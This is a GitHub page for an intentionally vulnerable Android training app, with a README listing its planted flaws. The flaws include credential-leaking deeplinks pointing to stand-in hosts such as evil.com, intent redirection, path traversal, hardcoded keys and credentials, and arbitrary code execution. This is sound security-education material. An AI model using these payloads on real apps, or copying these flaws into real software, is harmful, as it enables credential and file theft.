- Notifications
You must be signed in to change notification settings - Fork182
Oversecured Vulnerable Android App
License
NotificationsYou must be signed in to change notification settings
oversecured/ovaa
Folders and files
| Name | Name | Last commit message | Last commit date | |
|---|---|---|---|---|
Repository files navigation
OVAA (Oversecured Vulnerable Android App) is an Android app that aggregates all the platform's known and popular security vulnerabilities.
This section only includes the list of vulnerabilities, without a detailed description or proof of concept. Examples from OVAA will receive detailed examination and analysis onour blog.
- Installation of an arbitrary
login_urlvia deeplinkoversecured://ovaa/login?url=http://evil.com/. Leads to the user's user name and password being leaked when they log in. - Obtaining access to arbitrary content providers (not exported, but with the attribute
android:grantUriPermissions="true") via deeplinkoversecured://ovaa/grant_uri_permissions. The attacker's app needs to processoversecured.ovaa.action.GRANT_PERMISSIONSand pass intent tosetResult(code, intent)with flags such asIntent.FLAG_GRANT_READ_URI_PERMISSIONand the URI of the content provider. - Vulnerable host validation when processing deeplink
oversecured://ovaa/webview?url=.... - Opening arbitrary URLs via deeplink
oversecured://ovaa/webview?url=http://evilexample.com. An attacker can use the vulnerable WebView settingWebSettings.setAllowFileAccessFromFileURLs(true)in theWebViewActivity.javafile to steal arbitrary files by sending them XHR requests and obtaining their content. - Access to arbitrary activities and acquiring access to arbitrary content providers in
LoginActivityby supplying an arbitrary Intent object toredirect_intent. - Theft of arbitrary files in
MainActivityby intercepting an activity launch fromIntent.ACTION_PICKand passing the URI to any file as data. - Insecure broadcast to
MainActivitycontaining credentials. The attacker can register a broadcast receiver with actionoversecured.ovaa.action.UNPROTECTED_CREDENTIALS_DATAand obtain the user's data. - Insecure activity launch in
MainActivitywith actionoversecured.ovaa.action.WEBVIEW, containing the user's encrypted data in the query parametertoken. - Deletion of arbitrary files via the insecure
DeleteFilesSerializabledeserialization object. - Memory corruption via the
MemoryCorruptionParcelableobject. - Memory corruption via the
MemoryCorruptionSerializableobject. - Obtaining read/write access to arbitrary files in
TheftOverwriteProvidervia path-traversal in the valueuri.getLastPathSegment(). - Obtaining access to app logs via
InsecureLoggerService. Leak of credentials inLoginActivityLog.d("ovaa", "Processing " + loginData). - Use of the hardcoded AES key in
WeakCrypto. - Arbitrary Code Execution in
OversecuredApplicationby launching code from third-party apps with no security checks. - Use of very wide file sharing declaration for
oversecured.ovaa.fileprovidercontent provider inrootentry. - Hardcoded credentials to a dev environment endpoint in
strings.xmlintest_urlentry. - Arbitrary code execution via a DEX library located in a world-readable/writable directory.
Licensed under the Simplified BSD License
Copyright (c) 2020, Oversecured Inc